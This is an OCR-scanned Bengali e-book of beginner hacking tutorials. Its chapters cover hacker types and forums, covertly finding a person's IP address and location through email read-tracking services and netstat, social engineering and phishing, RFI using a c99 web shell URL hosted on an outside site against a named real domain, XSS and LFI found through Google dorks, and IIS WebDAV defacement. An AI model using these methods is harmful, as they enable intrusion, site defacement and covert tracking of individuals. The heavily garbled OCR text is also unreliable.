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হ্যাকিং শব্দটির মধ্যেই রয়েছে একটা এশ্বর্য্যকর ভাবমুর্তি। শব্দটার মধ্যেই রয়েছে WE! ছোট্ট বাচ্চা খেকে শুরু করে বৃদ্ধ সবারই হ্যাকিং 
শেখার আগ্রহ অত্যাধিক। আর এর নিরিক্ষে কাজ করে একটাই, নিজেকে হ্যাকার তৈরি করার "ul তবে হ্যাকিং দু-দিক থেকে উঠে 
আসে আমাদের সামনে এক হ্যাকিং শিথে অন্যেরক্ষতি করা দুই নিজেকে হ্যাকারের কাজ থেকে বাঁচানো। প্রথমটি অবশ্যই দন্ডনীয় 
আপরাধ, তবুও এটার প্রতি আগ্রহ অনেকাংশই বেশী। হ্যাকার হতে হলে অবশ্যই কোডিং এ দক্ষ হতে হবে যেটা হল বেসিক হ্যাকিংয়ের 

প্রথম কাজ। তাই আপনাদের হ্যাকিংয়ের কিছু প্রাথমিক ধারনা দিতে ও সকলের সুবিধার জন্য আমরা হ্যাকিংয়ের সাথে পরিচিতি এবং 

কিছু ব্যাসিক টিউটোরিয়াল নিয়ে একটি ই-বুক প্রকাশ করলাম। এখানে হ্যাকিংয়ের টিউটোরিয়াল গুলোকে উদাহরণ ও 5 
সাহায্যে সহজভাবে উপস্থাপন করার চেষ্টা করাহয়েছে। হ্যাকিং একটি অনেক বিশাল কনসেপ্ট,যা একটি মাত্র বইয়ে সংকলন করা সম্ভব 
নয়। তাই আমরা এর আরও খণ্ড এবং সংস্করণ সামনে বের করব। 


ধন্যবাদন্তে 
ফারুক আহমেদ 


www.fb.com/md.faroqueahmed 


etre 


ki 


হ্যাকিং জগৎ প্রথম খন্ড ব্যাসিক হ্যাকিং টিউটোরিয়াল 


ত অধ্যায়-০১ হ্যাকার কাকে বলেঃ 

ত অধ্যায়-০২ হ্যাকার কারা? হ্যাকারদের জন্য ফোরাম ও রিসোর্স 

ME অধ্যায়-০৩ আইপি এড্রেস কি? এবং তার খুটিনাটি i 

ME অধ্যায়-০৪ আইপি এড্রেস অনুসন্ধান করা 

HE অধ্যায়-০৫ সোস্যাল ইঞ্জিনিয়ারিং 

۲ অধ্যায়-০৬ RFI (Remote File Inclusion) ওয়েব সাইট হ্যাকিং 
ত অধ্যায়-০৭ XSS ওয়েব সাইট হ্যাকিং 

۲ অধ্যায়-০৮ (LFI) Local File inclusion Shell upload ওয়েব সাইট হ্যাকিং 
WE অধ্যায়-০৯ ۱۱5 হ্যাকিং (এক্সপি এবং সেভেন) 

ll অধ্যায়-১০ DNN (Dot Net Nuke) সাথে ভিডিও ওয়েব সাইট হ্যাকিং 
15 অধ্যায়-১১ DdoS কি, কেন এবং কিভাবে? 

Mwen» (Havij SQLi injection) ওয়েব সাইট হ্যাকিং 
ত অধ্যায়-১৩ SQL injection Manual Live ওয়েব সাইট হ্যাকিং 
Ej অধ্যায়-১৪ কিভাবে ওয়েব সাইটে শেল আপলোড করতে হয় 

Hg অধ্যায়-১৫ ভিফেস পেজ কি? কিভাবে ডিফেস পেজ বানাতে হয় 
উঠ অধ্যায়-১৬ সহজে ওয়াই-ফাই হ্যাকিং 
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“FAN হ্যাকিং অধ্যায় -১ 
কাক M 


হ্যাকার হচ্ছেন সেই ব্যক্তি যিনি নিরাপত্তা/অনিরাপত্তার সাথে জড়িত এবং নিরাপত্তা ব্যবস্থার দুর্বল দিক YO বের 
করায় বিশেষভাবে দক্ষ অথবা অন্য কম্পিউটার ব্যবস্থায় অবৈধ অনুপ্রবেশ করতে সক্ষম বা এর সম্পর্কে 
গভীরজ্ঞানের অধিকারী। সাধারনভাবে হ্যাকার শব্দটি কালো-টুপি হ্যাকার অর্থেই সবচেয়ে বেশি ব্যবহৃত হয় যারা 
মূলত ধ্বংসমূলক বা অপরাধমূলক কর্মকান্ড করে থাকেন। এছাড়া আরো নৈতিক হ্যাকার রয়েছেন (যারা 
সাধারনভাবে সাদা টুপি হ্যাকার নামে পরিচিত) এবং নৈতিকতা সম্পর্কে অপরিষ্কার হ্যাকার আছেন যাদের ধুসর 
টুপি হ্যাকার বলে। এদের মধ্যে পার্থক্য করার জন্য প্রায়শ ক্র্যাকার শব্দটি ব্যবহার করা হয়, যা কম্পিউটার 
নিরাপত্তা হ্যাকার থেকে একাডেমিক বিষয়ের হ্যাকার থেকে আলাদা করার জন্য ব্যবহার করা হয় অথবা অসাধু 
হ্যাকার কোলো টুপি হ্যাকার) থেকে নৈতিক হ্যাকারের (সাদা টুপি হ্যাকার) পার্থক্য বুঝাতে ব্যবহৃত হয়। হ্যাকাররা 
CRAM জগতে নতুন কিছু সৃষ্টি করতে পারে,সমস্যার সমাধান করতে পারে। তারা স্বাধীনতা এবং পারস্পরিক 
সহযোগীতায় বিশ্বাসী। হ্যাকার হওয়ার সর্বপ্রথম শর্ত হচ্ছে আপনাকে আগে ঠিক করতে হবে আপনি কোন ধরনের 
হ্যাকার হবেন। উপরে ৩ ধরনের হ্যাকার সম্পর্কে বলা হয়েছে। আপনাদের সুবিধার্থে আরেকটু পোষ্ট করছি। 


সাদা টুপি হ্যাকার (White Hat Hacker)- এরা কম্পিউটার তথা সাইবারওয়ার্ডের নিরাপত্তা প্রদান করে। এরা কখনও 
অপরের ক্ষতি সাধন করে না।এদেরকে ইথিকাল হ্যাকারও বলা হয়ে 5۱ 


ধূসর টুপি হ্যাকার (Grey Hat Hacker)- এরা এমন একধরনের হ্যাকার যারাসাদা টুপি ও কালো টুপিদের মধ্যবর্তী 
স্থানে অবস্থান করে। এরা ইচ্ছে করলেকারও ক্ষতি সাধনও করতে পারে আবার উপকারও করতে পারে। 


কালো টুপি হ্যাকার (Black Hat Hacker)- হ্যাকার বলতে সাধারনত কালো টুপিহ্যাকারদেরই বুঝায়। এরা সবসময়ই 
কোন না কোন ভাবে অপরের ক্ষতি সাধন করে।সাইবার ওয়ার্ল্ডে এরা সবসময়ই ঘৃনিত হয়ে থাকে। এছাড়াও আর 
কিছু হ্যাকার ধরন রয়েছে। যেমন :- 


far কিডি (Script Kidie)- এরা নিজেরা কিছুই পারে না বরং বিভিন্নটুলস্‌ বা অন্যের বানানো ft ব্যবহার 
করে এরা কার্যোসিদ্ধি করে। 


নিওফাইট বা নোব (Neophyte or nOOb)- এরা হ্যাকিং শিক্ষার্থী। এরা হ্যাকিং কেবল শিখছে। অন্য অর্থে এদের 
বিগিনার বা নিউবাই বলা যায়। 


লিখেছেনঃ মেহেদি হাসান 


হ্যাকার কারা? হ্যাকারদের জন্য ফোরাম, রিসোর্স 


হ্যাকার যারা : 


হ্যাকার হচ্ছেন একজন ব্যাক্তি যিনি শুধুমাত্র বিভিন্ন মাধ্যম/সিস্টেম এর yo খুজে বের Fal কিন্ত তিনি এর 
ক্ষতিসাধন করেন না। একজন হ্যাকার মূলত একজন প্রোগ্রামার যার প্রধান কাজ হচ্ছে অনলাইনে কোন সিস্টেমের 
খারাপদিকগুলো খুজে বের করা। তারা প্রোগ্রামার এবং তারা প্রোগ্রাম নতুন নতুন খুতবের করতে ব্যবহার করে। 


হ্যাকার ফোরাম : 


আপনি একজন হ্যাকার হতে হলে প্রথমে আপনাকে বিভিন্ন ইথিকাল হ্যাকার যারামূলত ইলিট (এ ব্যাপারে আগের 
অধ্যায়ে বলা হয়েছে) তাদের থেকে গুরুত্বপূর্ণ টিপসগুলো শিখে নিতে হবে। আর বিভিন্ন ধরনের টিপস নিয়ে 
আলোচনা হয় ফোরামে।নিচে হ্যাকারদের জন্য কয়েকটি গুরুত্বপূর্ণ ফোরামের লিংক প্রদান করা হল। ফোরামগুলোতে 
যোগদিন এবং নিয়মিত পোস্টগুলো পড়ুন। কোন বিষয় জানতে চাইলে সেখানেই সাহায্য চাইতে MATI 


www.hackerthreads.orgwww.hackforums.netwww.hacker.org/forumwww.crackhackforum.com 


হ্যাকিংরিসোর্স : 


হ্যাকিং করতে হলে বিভিন্ন সফটওয়্যার প্রয়োজন হয়, প্রয়োজন হয় কোড, স্ক্রিপ্ট, ডর্ক ইত্যাদির। নিচে কিছু লিংক 
দেয়া হল যেখান থেকে আপনি অনেকমূল্যবান হ্যাকিং রিসোর্স পেতে পারেন যা আপনাকে হ্যাকার হতে সাহায্য 
করবে। 


http://www.ethicalhacker.net/http://insecure.org/http://hacker.resourcez.com/http://www.certifiedethicalhacker. 
com/http://www.elitehack.net/http://www.elite-hackers.com/http://www.exploit- 

db.com/http://www.1337day.com/http://www.breakthesecurity.com/http://www.thehackerslibrary.com/http://w 
ww.port7alliance.com/http://www.hackers.nl/http://hackmein.tripod.com/http://kyrionhackingtutorials.com/http 


://www.hacking- 
gurus.net/http://hackmyass. wordpress.com/http://www.borntohack. in/http://www.criticalsecurity.net/http://ww 


w.mpgh.net/http://www.duniapassword.com/http://www.progamercity.net/3YI4 Tq 


মুভি : 


আইপি এড্রেস কি? IP Address কি এবং তার খুঁটিনাটা 


আইপি এড্রেস কি? 
IP Address কি এবং তার খুঁটিনাটী ?? 


IP Address কি? IP Address বা Internet ProtocolAddress হল একটি সংখ্যাবিশেষ যা Network-4 যুক্তপ্রতিটি 
[০%1০০-এর জন্য নির্ধারিত যারা Communication. 29 জন্য Internet Protocol ব্যবহার করে। প্রতিটি IP Address 
হল Unique, আপনি যখন একটা নিৰ্দিষ্ট IP /৫৫/০5ব্যবহার করছেন তখন সেটা আর কেউ ব্যবহার করার সম্ভবনা 
নেই IP Address দিয়েই Network ব্যবহারকারীকে শনাক্ত করা হয়।আপনি যে Internet ServiceProvider-AF কাছ 
থেকে InternetOT4T পাচ্ছেন তারা এই IPAddress-24 মাধ্যমেই আপনাকে আলাদাভাবে শনাক্তকরতে ۱ 


IP Address-AF কাজ কি? IP Address-24 মূলত দু'টি কাজ রয়েছে। 


1.Host বা Network Interface শনাক্তকরণ, যাতে আপনি N ঠকভাবে আপনার কাঙ্খিত Communication সম্পন্ন করতে 
পারেন। 


2.Network ব্যবহারকারীর অবস্থান খুঁজে বের করা। প্রতিটা IP Address একটা নিৰ্দিষ্টস্থানকে নির্দেশ করে। তাই, 
আপনি কোন জায়গা থেকে Network ব্যবহার করছেন এটা IPAddress-AF মাধ্যমে জানা যায়। IP ۸۵06-7۲ 
হল Binary Number, কিন্ত বোঝার সুবিধার জন্য এগুলোকে মানুষের পঠনযোগ্যসংকেত অক্ষর বা সংখ্যা) দিয়ে 
প্রকাশ করা হয়ে থাকে ۱1۳ Address-94 Version 


হ্যাকারদের জন্য একটি অতি গুরুত্বপূর্ণ জিনিস হচ্ছে এই IP Address. যেহেতু IPAddress-28 মাধ্যমে Network 
ব্যবহারকারীর স্থান জানা যায়, তাই হ্যাকারের জন্য IP Address) রাখা খুবই জরুরী একটা কাজ। নাহলে 
হ্যাকারের অবস্থান ফাঁস হয়ে যাওয়ার একটা চান্স থাকে। 


আপনার নিজের আইপি এড্রেস দেখা : 


প্রথমে Start->Run->anf4 ঘরে লিখুন cmd এবার কী-বোর্ড থেকে এন্টার চাপুন। একটি কমান্ড এরিয়া দেখতে 
পাবেন। সেখানে লিখুন netstat -n এন্টার চাপুন। একটি লিস্ট আপনার সামনে আসবে। লোকাল ISO দিকে 
খেয়াল করুন। যেটি প্রথমে আসবে সেটিই আপনার আইপি এড্রেস। দ্বিতীয় নিয়ম : আপনার ব্রাউজারের এড্রেস 
বারে লিখুন www.whatismyip.com 
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দাতার আইপি অনুসন্ধান : 


আপনার মেইলবক্স খুলুন। তার থেকে যেকোন একটি ইমেইল খুলুন। Reply-Ce ক্লিককরুন। এবার Show original এ 
ক্লিক করুন। এখন যে তথ্যগুলো আসবে সেগুলো খুবভালোভাবে খেয়াল করুন। সেখানেই আপনি হয়ত ইমেইল 
দাতার আইপি দেখতে পাবেন। কিন্তু gmail থেকে যদি কেউ আপনাকে মেইল করে তাহলে এই পদ্ধতি অনুসারে 
আপনি আইপি খুজে পাবেন না। এখন উপায়? হ্যা হ্যা অস্থির হবেন না। এক্ষুনি তা বলছি। 


আসলে মূল ব্যাপারটি হচ্ছে gmail সবসময় https ব্যবহার করে। আমরা সাধারনত ওয়েবসাইটের IVA দেখতে পাই 
http যার সম্পূর্ণ রূপ হচ্ছে Hyper Text Transfer Protocol. আর https হচ্ছে এই http এর secured রূপ। আশা করি 
বুঝতে পেরেছেন। যার কারনেই জিমেইলে আপনি আইপি খুজে পাবেন না। এখন যেই পদ্ধতিটির কথা আপনাদের 
বলব সেটি হচ্ছে প্রায় সব ধরনের ইমেইল এড্রেস (ইয়াহুমেইল, জিমেইল, এমএসএন ইত্যাদি) থেকে আইপি বের 
করার পদ্ধতি। প্রথমেই http://readnotify.com/ সাইটটি খুলুন। এরপর এখানে রেজিষ্ট্রেশন করুন।এখন আপনি যার 
ইমেইল এড্রেস অনুসন্ধান করতে চান তার বরারব একটি মেইল লিখুন। এবার ইমেইল টু সেকশন এরিয়ায় লিখুন 
victim’ semailid.rednotify.com পাঠিয়ে hal যখন সে ইমেইলটি পড়বে তখন স্বয়ংক্রিয়ভাবে আপনার রিডনোটিফাই 
একাউন্টে তার আইপি চলে SIGN আসলে রিডনোটিফাই একটি স্বয়ংক্রিয় লুকানো ছবি আপনার ইমেইলের সাথে > 
ব্যাক্তি বরাবর পাঠিয়ে দেয়। যার ফলে আপনি তার আইপি পেয়ে যান। পদ্ধতিটি খুব কাজের। 


৯ ওয়েব সাইড টি পছন্দ না হলে গুলো ব্যবহার করবেনঃ 


http://www.didtheyreadit.com/ 


http://w ww.pointofmail.com/ 


অবস্থান অনুসন্ধান : আমরা তো আইপি পেলাম এবার দেখব কিভাবে & ব্যাক্তির অবস্থান সম্পর্কে জানা যায়। 
অর্থাৎ ব্যাক্তিটি কোন দেশের কোন শহরে আছে তা জানা। প্রথমেই http://www.ip2location.com/ সাইটটি খুলুন। এই 
সাইটটির খালি ঘরে আপনার RS আইপি এড্রেসটি বসিয়ে দিন আর মজা দেখুন। 


আপনি যার সাথে চ্যাটিং করছেন তার অবস্থান জানা : 


আপনি যার সাথে চ্যাটিং করছেন তাকে তার আইপি সম্বন্ধে জিগ্যেস করুন। সেবললে তো বলতে হবে আপনার 
ভাগ্য FANS) আর না বললে কি করবেন? একটু অপেক্ষা করুন বলছি। এখানে একটি ব্যাপার উল্লেখ করার মত 
আর তা হচ্ছে আগে আমরা একটি কমান্ডের সাথে পরিচিত হয়েছিলাম। netstat -n এর কথা মনে আছে? 
এইকমান্ডটি খুবই গুরুত্বপূর্ণ। আপনি ইন্টারনেটে যতগুলো কানেকশনের সাথে যুক্ত আছেন ঠিক ততগুলোর তথ্যই এই 
কমান্ডটির মাধ্যমে পাওয়া MAI আরেকটু ভেঙ্গে বলছি। ধরুন, মনে করুন আপনি ফেসবুকে,জিমেইলে এবং 
টেকটিউনসে একই সঙ্গে প্রবেশকরে আছেন। উপরের কমান্ডটি এই তিনটি সার্ভার সম্পর্কেই আপনার কাছে তথ্যসাপ্লাই 
করবে। বৰ্তমানে ইন্টারনেটে এক এক ব্যাক্তি চ্যাটিং এর এক এক পন্থাব্যবহার PA! যেমন : ICQ Messenger, 
MSN Messenger, Yahoo Messenger, Gtalk, Meebo, 01899, AIM ইত্যাদি। তাহলে বুঝুন কতটুকু ঝামেলার কাজ 
করতে যাচ্ছেন আপনি? আর এ কারনেই নিচে ধাপে ধাপে কয়েকটি ক্ষেত্র দেয়া হল। লক্ষকরুন। 


ক্ষেত্ৰ-১ যদি আপনি ICQ Messenger এ চ্যাট করেন আর সেখানের কারও অবস্থান জানতে চান তাহলে এ পদ্ধতিটি 
কাজে লাগান। ICQ Messenger এর কাজ করার ধরন হচ্ছে আপনি-১আপনার বন্ধু-১আপনি) এইভাবে। তাই 
কারও আইপি সংগ্রহ করাএক্ষেত্রে খুব সহজ কাজ। মনে করুন আপনি কারও আইপি জানতে চাচ্ছেন তাহলে তাকে 
হিট করুন কিন্তু চ্যাটিং শুরু করবেন না। এবার Start->Run->cmd->netstat -nITa Mal যে আইপিগুলো আসবে 
তা কোন রাফ কাগজে লিখে রাখুন। এবার আপনি তার সাথে চ্যাটিং আরম্ভ করুন। আবার Start->Run->cmd- 
>netstat -nIEIT দিন। এবার আপনি সেখানে নতুনএকটি আইপি দেখতে পাবেন। আর এই ব্যাক্তির সাথেইআপনি 
এখন চ্যাটিং এ ব্যান্ত।এবার কিভাবে তার অবস্থান বের করবেন তা নিশ্চয়ই আর বলে দিতে হবে AI 


ক্ষেত্ৰ-২ 


.::: Yahoo Messenger, MSN Messenger, GTalk Messenger এর ক্ষেত্রে :::উপরোক্ত মেসেনজারগুলোর কাজ করার 
ধরন হচ্ছে (আপনি-মেসেনজারেরসার্ভার-আপনার বন্ধু) এইভাবে। এখানে যদি আপনি ক্ষেত্র-১ এর পদ্ধতি কাজে 
লাগান তাহলে আপনি মেসেনজারের আইপি পাবেন, ব্যাক্তির না। এইক্ষেত্রে আপনি চালাতে পারেন সোস্যাল 
ইনিজনিয়ারিং। যদিও এটা নিয়ে পরবর্তী অধ্যায়ে আলোচনা হবে তথাপি এখানে কিছু পরিচিতি দেয়া I সোস্যাল 
ইনিজনিয়ারিং হচ্ছে কাউকে বোকা বানিয়ে তাকে হ্যাকিং করা। আর এই মেসেনজারের ক্ষেত্রে মনে রাখবেন 
অধিকাংশ মেসেনজারই এই কাজটি করে থাকে) আপনি আপনার সাথে চ্যাটিংকৃত ব্যাক্তিটিকে বলুন আপনার কাছে 
কোন ফাইল পাঠাতে বা তাকে আপনিকিছু পাঠাতে পারেন, সেটা হতে পারে কোন ছবি বা আপনার ছবি। যদি সে 
রাজি হয় তাহলে ক্ষেত্র-১ এর পদ্ধতি চালিয়ে যান। যখন আপনি তার সাথে চ্যাটিং করবেন তখন আপনি 
অতিরিক্ত যে আইপি এড্রেসটি দেখতে পাবেন সেটি হচ্ছে মেসেনজারেরআইপি আর যখন সে আপনার কাছে কোন 
কিছু পাঠাবে তখন আরেকটি নতুন আইপি দেখতেপাবেন, সেটি হচ্ছে তার আইগি। এছাড়াও আরও একটি উপায় 
আছে তা হল, আপনি তাকে আপনার কাছে একটি মেইল পাঠাতে বলতে পারেন। যখনই সে মেইল পাঠাবে আপনি 
রিডনোটিফাই পদ্ধতি চালিয়ে যান যা আগে বলা হয়েছে। কোন AN 
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.:: Meebo, Gigsby, Trillion ইত্যাদি মাল্টি চ্যাটিং ইনিজনের ক্ষেত্রে :::.এক্ষেত্রে কোন পদ্ধতি (RI শুধু এতটুকুই করা 
যায় তা হল আপনি বলতে পারেন আপনাকে মেইল করতে আর আপনি রিডনোটিফাই পদ্ধতি চালাতে পারেন। 
আসলে কারও আইপি পাওয়া তেমন কঠিন কাজ নয় আর এটা তেমন বড় ধরনের কাজও নয়। আইপিএড্রেসের 
ব্যাপারে বলতে গেলে অনেক কথা বলতে হয়। আইপি এড্রেস রয়েছে বিভিন্ন ধরনের। আবার সেখানে সাবনেট 
আইডি এবং হোস্ট আইডি নামক ব্যাপার রয়েছে। এছাড়াও আপনি একটি ওয়েবসাইট শুধু আইপি এড্রেস লিখেই 
প্রবেশ করতে পারেন যদিও সেখানে AH ট্রান্সফার এবং (FAST ট্রান্সফার নামক 


লিখেছেনঃ মেহেদি হাসান 


সোস্যাল Par TÉ We ER 


চাইলে Forget password এ ক্লিক 5 BEA সাধারন কয়েকা র উত্তর 
T মানুষ D সকল জায়গায় কিছু সাধারন প্রশ্নই বেছে নেয়, আর আপনি 
অনেক গোপন তথ্যও জানেন, তাই নয় Mili দেখা যাচ্ছে এখানে 


কৃয়াটি লক্ষ করুন। সে শুধু নিজের চিন্তা কাজে লাগাল এবংএকটি ছোটবাশি তৈরী ব করল। তাহলে দেখুন 
নিয়ারিং খুবইগুরুত্বপূর্ন।আপনি কোন কিছুকে বড় করতে হলে সোস্যাল Za 


| 
| 
| 


করতেচাহলে Forget password এক্লিক করেই সাধারন কয়েকটি AGA উত্তর 
চারন মানুষ সকল জায়গায় কিছু সাধারন প্রশ্নই বেছে নেয়, আর আপনি 
ধারন তো আছেই এমনকি অনেক গোপন তথ্যও জানেন, তাই নয় কী? তাহলে দেখা যাচ্ছে এখানে 
রং একটি গুরুত্বপূর্ণ বিষয়। r | 


মনে করুন আপনার ইমেইলে এল এরকম একটি বার্তা যে, Congrats! You have got 100000 free visitor, CLICK 
HERE for withdraw. এভাবে প্রতিদিন সমগ্র বিশ্বে হাজার হাজার মানুষ তাদের ক্রেডিটকার্ডের তথ্য সহ 
বিভিন্নগুরুত্বপূর্ণ তথ্য অনলাইনে জমা দিচ্ছে আর হ্যাকিংয়ের শিকার RI সোস্যাল ইন্জিনিয়ারিং নিম্নোক্ত কয়েকটি 
ভাগেবিভক্ত। 


—>impersonation 
—»posing as imp. user 
—>3rd person approach 


—>technical support 


কম্পিউটার ভিত্তিক সোস্যাল ইন্জিনিয়ারিং: 
নিচের কয়েকটি ভাগে বিভক্ত। 


—>mail/im attachments 
—>pop up windows 
—>sweepstakes 
—>spam mail 


এই অধ্যায়ের এখানেই সমাপ্তি। মনে রাখবেন কোন কাজ করার আগে এর সোস্যাল ইনিজনিয়ারিংয়ের ব্যপারটি খুব 
ভালোভাবে অনুধাবন করা উচিত। যখন আমরা কারও ইমেইলে কোন কিছু পাঠাই এবং সে যদি কিছু 


লিখেছেনঃ মেহেদি হাসান 


CEA Jeu 
RF! (Remote File Inclusion)ওয়েবসাইট হ্যাকিং। 
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&) Google Translate 


ABOUT US SERVICES METHODOLOGY PROJECTS CLIENTS CONTACT US CAREERS 


আমাদের কথা লিংক ٩ 24 an বিধি «yte! দেয়াল 


Search 


VINER 


«« TunerPage 


http://hl.ripway.com/tjunselected/c99shell.php? 


http://www.cbspk.com/v2/index.php?page-http://hl.ripway.com/tjunselected/c99shell.php? 


ABOUTUS SERVICES METHODOLOGY PROJECTS CLIENTS CONTACT US 


e 


۱69956۱۱ v. 1.0 pre-release build 


Software: . PHP/4.3.4 
uname -a: Windows NT WWW6 5.2 build 3790 
Administrator 


m 9 = জী ? Encoder Tools 
brute Sec. SQL PHP-code Update Feedback 


UE ing folder (1 files and 0 folders): 


Name Modify Perms 
m, 14.02.2011 05:13:38 
m. 31,12,1969 18:00:00 Trem 
2 158.44 KB 14.02.2011 05:13:38 


Sg 


Safe-mode: & 9 
My ঠাসা NS 
shell execute Detected dre] 0 ۱ 


Done 


তবে অবশ্যই মনে রাখবেন লিংকের শেষে“? ”প্ৰশ্নবোধক PER লাগিয়ে দিবেন। 
না। 


নতুবা আপনার শেল কাজ করবে 


XSS ? 

XSS হ্যাকিং সম্পর্কে জানতে হলে প্রথমেই জানতে হবে XSS জিনিসটা কি? Cross site Scripting এর সংক্ষিপ্তরূপই 
হচ্ছে XSS এটাকে আবার CSS(Cascading Style sheet) 8 বলে থাকে। যার যেভাবে ইচ্ছা সে ভাবে বলে। এটা Web 
Application Vulnerability এর সবচেয়ে জনপ্রিয় গুলোর একটি। এই vulnerability একজন হ্যাকারকে একটি সাইটে 
client side scripts (বিশেষ কিছু Javascript) ইনসাৰ্ট করার অনুমতি প্রদান করেন। এই vulnerability দিয়ে একজন 
হ্যাকার ভিকটিমের সাইটে malicious codes, malware attack, phishing ইত্যাদি inject করাতে পারে। 


http://3.bp.blogspot.com/_IBoKsfWMAhbE/TL YDr8vVOmTI/AAAAAAAAAAM/V1wVW YOGB70/s1600/ 
xss-threat3.jpg 


XSS Vulnerability and Injection 
ধাপ ১: Vulnerable ওয়েব সাইট খুঁজে বের করা 


আপনে প্রথমে Vulnerable সাইট খুজে বের করুন | এজন্য সে প্রথমে Google 1 যান। তারপর Google Dorks 
ব্যবহার করে Vulnerable সাইট খুজে বের করেন। তাহলে আপনি তার সাথে সার্চ দিন নিচের sql Injection দিয়ে। 


"search?q=" 
তাহলে আপনি অনেকগুলো Vulnerable সাইট খুজে পাবেন। এবার একটি সাইটে প্রবেশ ۱ 
ধাপ 3: Vulnerability পরীক্ষা করা 


এখন আমরা যে সাইটে প্রবেশ করেছি, সেই সাইটের Vulnerability পরীক্ষা করে দেখব। এজন্য আপনাকে প্রথমে উক্ত 
সাইটের এবটি পোষ্ট বা parameter খুঁজে বের করতে হবে। বুঝেছেন? 

না বুঝলে একটু অপেক্ষা করেন, বলছি। মানে আপনি এমন একটি পোষ্টখুঁজে বের করবেন যা উক্ত সাইটের সার্ভার 
পাঠাবে। যেমনঃ search query, username, password. 

Vulnerability পরীক্ষা করা জন্য দুটি পদ্ধতি আছে। 


পদ্ধতি ১: প্রথম পদ্ধতি হল সাইটের মূল সার্চ বক্সে injection FATI 
একজন হ্যাকার সাধারণত সাইটের মূল সার্চ বক্সে একটি malcious Script লিখে, তারপরসার্চ বাটনে ক্লিক করে। সার্চ 
দেয়ার সাথে সাথে malcious script টি ওয়েবসাইটে কাজ করা শুরু করে দেয়। 


http://2.bp.blogspot.com/- 
8z5CXuZZpeg/TpgB stdbdBVAAAAAAAAASE/gCTc_dxniWE/s1600/seatch+box.jpg 


পদ্ধতি ২: সাইটের URL এ injection FAT 
এটি কোন সার্চ বক্সে কাজ করে না। এটি শুধু মাত্র সাইটের URL এ কাজ করে AS! যেমনঃ- 


htp://vulnerablewebsite/search?q-malicious script goes here 
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Session Hijacking 
Malware Attack 
Website Defacement 
Dos attacks 


অনির্বাচিত টিউনার" ও গুগল 


(LFI) Local Fife inclusion Shell upload ওয়েবসাইট হ্যাকিং 


শুভ কামনা আপনাদের জন্য। হ্যাকিং শিখুন কিন্তু হ্যাকিং ক্ষতি করার উদ্দেশ্যে কাজে লাগাবেন না। মূলতঃ হ্যাকিং 
ম্যাথডের শেষ নেই। আশা করি কেউ বলতে পারবে না যে, 


আমিহ্যাকিংয়ের সবই পারি, তাহলে সে ভুল বলেছে। একের পর এক নিয়ম তৈরি RI 


হ্যাকিং করা হয় আসলে নিজের মেধা দিয়ে। আপনি যে ভাবে পারেন, হ্যাকিং করে যাবেন। আজ দেখাব হ্যাকিংয়ের 
আরেকটি জনপ্রিয় AAG! এটা অনেকেই ব্যবহার করেথাকে। চলুন তাহলে মূল পর্বে চলে যাওয়া AS! 


LFI! 
হ্যাকারদের 

একটি জনপ্রিয় ম্যাথড। এটি একটি সংক্ষিপ্ত নাম। এই সংক্ষিপ্ত শব্দটির পূর্ণরূপ হল 
Local File Inclusion. INST 

আপনাদের 

হাতে-কলমে দেখাব কিভাবে আপনি একটা সাইটে LFI Injection দিতে হয়। 

প্রথমে 


নিচের PHP কোডগুলো 


দেখুন... 


$page-$ GET[page]; 
include($page); 
p» 


উপরে php কোডটি অনেক ওয়েব ডেভেলপাররাই তাদের ওয়েবসাইটে ব্যবহার করে থাকে। 


fèw এটি আসলে তারা ভুল করে ANPI কারণ এই $288০কোডটি sanitized না এবং এটি এটা হ্যাকারদের পথটা 
সহজ করে GA মূলতঃ এই কোডটি হ্যাকাররা তাদের LFI হ্যাকিংয়ের কাজে ব্যবহার করে থাকে। আপনি যদি 
বিভিন্ন সাইট ঘুরে থাকেন, তাহলে হত নিচের কোড সাইটের লিংক দেখতে পারবে। 


www.mywebsite.com/index.php?page=products.php 


আপনিএই ধরনের সাইটে, কোন ধরনের পরীক্ষা ছাড়াই বুঝতে পারবেন যে, 
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http://www. youtube.com/watch?v=hM guilRste Y 


কার্টেসি-অনির্বাচিত ۷ 


NS হ্যাকিং [XP এবং 7 এ ] সাথে ভিডিও 


আসসালামু আলাইকুম, সবাইকে আবারওস্বাগতম জানিয়ে আজকের টিউন শুরু করছি। 


কেমন আছেন আপনারা ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে খুবই ভাল আছেন। আজ আবারও আপনাদের 
জন্য এনেছি ওয়েব হ্যাকিং নিয়ে ۱ তো কথা কম বলে কাজের কথায় আসি। 
আজ আমি আলোচনা করব IIS(IIS=The Internet Information Server Attack) নিয়ে | 


উইন্ডোজ এক্সপি এর নিওমাবলিঃ 
S.Run এ 


%WINDIR%EXPLORER.EXE ,::{20D04FEO-3AEA-1069-A2D8-08002B30309D}::{BDEADFO0-C265-11d0-BCED- 
00A0C90AB5OF) 
লিখে Enter চাপুন | 


i. একটি ফোল্ডার আসবে যার নাম “WEB FOLDER" | 


v. এখন Right click করে New>Add Web Folder>vulnerable website address . 
Google Dork :- "Powered by IIS” 
৪.ক্লিক Next>Next>Finish . 
৫.ডাবল ক্লিক করে তোমার ডিফেস কপি পেস্ট করে দিন | 


এখন তোমার ডিফেস পেজ : http://www.target.com/deface.html 
ভিডিও টিউটোরিয়াল : http://www.youtube.com/watch?v-P4lSzsSBTik 


বিঃদ্রঃ Microsoft IF সাইটের vulnerability ঠিক করেছে, তাই vulnerable সাইট পাওয়া কষ্টকর | 


>>উইন্ডোজ ৭ এর নিয়মাবলি >> 


কিভাবে উইন্ডোজ ৭ এ IIS Exploit হ্যাকিং করবেন ? পারবেন ? আপনাদের জন্য এর আগে fòs পিনিক্স ক্র একটা পোষ্ট 
করেছিল IIS Exploit এর উপর। তাহলে আর কথা নয়, এখনই শুরু করে দেই টিউটোরিয়ালটি icon smile IIS Exploit সম্পূর্ণ 
বাংলা হ্যাকিং টিউটোরিয়াল 


প্রথমে My Computer এর যান। এবার খালি জায়গায় রাইট বাটন ক্লিক করে Add a network Location এ ক্লিক করুন। 


এবার Next বাটনে ক্লিক করুন। 
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Internet or network address 
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Recent Places a shell.zip 


& Downloads as desktop background 
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Scan with ESET NO 
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Properties 
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Type webadress And file name... 


tCode asp 
tPayHandle 
GetPayNotify asp 
haryang2 
Head asp 
Head! asp 


hyfabu.asp 


listad asp 
Login.asp 


lostpass as) 


E ::-:: POwe3r.1n-10 Cyber CadeT Forc.. এ: Umer Rock's ASP SHEI 


ft El Feedback» 
Type webadress And file name 


Dvbbs8.2.0_ac.exe 5,254 Kbytes 
edit.asp 15 Kbyt 
editad.asp 15K 
editad_save.asp 5 Kbytes 
